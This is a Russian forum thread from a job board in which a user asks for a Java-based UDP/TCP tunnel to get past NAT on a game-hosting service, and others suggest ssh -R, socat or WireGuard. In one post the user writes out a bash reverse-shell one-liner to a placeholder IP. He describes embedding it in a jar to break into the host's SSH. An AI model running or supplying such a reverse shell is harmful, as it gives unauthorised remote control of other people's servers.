LINUX.ORG.RU
ФорумJob

java tunnel

 lighttunnel, , , rpt,


0

2

Сколько будет стоить java reverse proxy? если есть желающие то могу скинуть тз. Протоколы нужны: udp\tcp. Приложение: Сервер программы должен запускаться как Jar File(тип файла:Executable Jar File (.jar)). Клиент может иметь любой тип файла.



Последнее исправление: maincrafter (всего исправлений: 7)

Клиент может иметь любое свойство файла.

Всё понятно и без тз)

pihter ★★★★★
()

Сколько будет стоить java reverse proxy?

$66k

level1 ★★
()
Последнее исправление: level1 (всего исправлений: 6)
Ответ на: комментарий от her_s_gory

Так я тз не давал полное чтобы ты мог судить какая программа подойдёт. Я лишь частичное дал и то ты нечего не понял раз у тебя программа не имеет:server.jar + clinet.jar, ну а так же ты не шаришь раз задаешь такие вопросы.

maincrafter
() автор топика

Приветствую!

Интересно посмотреть на ТЗ. Если есть возможность скинь на почту.

areful
()
Ответ на: комментарий от maincrafter

Это и есть реверс-прокси, для него отдельный клиент не нужен, он сам перенаправляет запросы куда надо.

А то что тебе нужно (если моя телепатия работает правильно) - это remote port forwarding, аналог ssh -R, только с udp (и зачем-то на java).

TheAnonymous ★★★★★
()
Ответ на: комментарий от tz4678_2

Мне кажется вам стоит разобраться в вопросе досконально

maincrafter
() автор топика
Ответ на: комментарий от TheAnonymous

Его запросы не дойдут до моего аипишника,т.к у меня он серый,чтобы дошли нужен клиент который открыл бы порт для него. Не знаешь что такое NAT? Ну если бы знал то понимал бы как программа должна работать/работает.

maincrafter
() автор топика
Ответ на: комментарий от maincrafter

То есть моё предположение оказалось верным, и тебе надо пробросить порт на серый IP? Штош, такой жабоподелки готовой вроде не находится.

Если тебе ехать, а не шашечки, можешь рассмотреть уже существующие решения, например, упомянутый ssh -R (если нужно udp, его можно завернуть в tcp например посредством socat).
Или почему не поднять нормальный L3 туннель (openvpn/wireguard/...)?

Если всё-таки прям нужна прокладка в виде жабоподелия, пиши тз конкретнее, может кто-нибудь и возьмется, но сейчас из оп-поста непонятно, что тебе нужно, «reverse proxy» это вообще говоря не про серые айпишники

TheAnonymous ★★★★★
()
Ответ на: комментарий от maincrafter

LightTunnel версия от 10 Dec 2020 имеет проблему с переполнением буфера озу.

RPT имеет проблему с пингом.

Ну а так же находил третью похожую программу но там не было конфиг файла тем самым не запустить с нужным портом ее.

maincrafter
() автор топика
Ответ на: комментарий от TheAnonymous

почему Java аналог WireGuard? потому что игровые хостинги имеют панель управления где можно запустить только jar file а чтобы запустить какое-то приложение не jar file эт нужно создавать jar file с кодом который будет использовать какую то команду, например sh -i >& /dev/tcp/10.10.10.10(аипи сервера netcat)/9001(порт сервера netcat) 0>&1,вот если исполнить эту команду то можно взломать ssh хостинга игрового чтобы накатить туда уже wireguard.

maincrafter
() автор топика
Ответ на: комментарий от maincrafter

там не было конфиг файла тем самым не запустить с нужным портом ее

Если речь про application.properties какой-нибудь, то его можно просто положить рядом с jar.

Zhbert ★★★★★
()
Ответ на: комментарий от maincrafter

Ну вот спустя три дня мучений ты выдал еще немного информации, которая может помочь тебе в решением задачи. Продолжай в том же духе.

Zhbert ★★★★★
()
Ответ на: комментарий от Zhbert

Он ещё бывает внутри джарника в виде file.yml. Не там только через командную строку запуска настроика была а через конфиг файл не было судя по описанию создателя.

maincrafter
() автор топика
Для того чтобы оставить комментарий войдите или зарегистрируйтесь.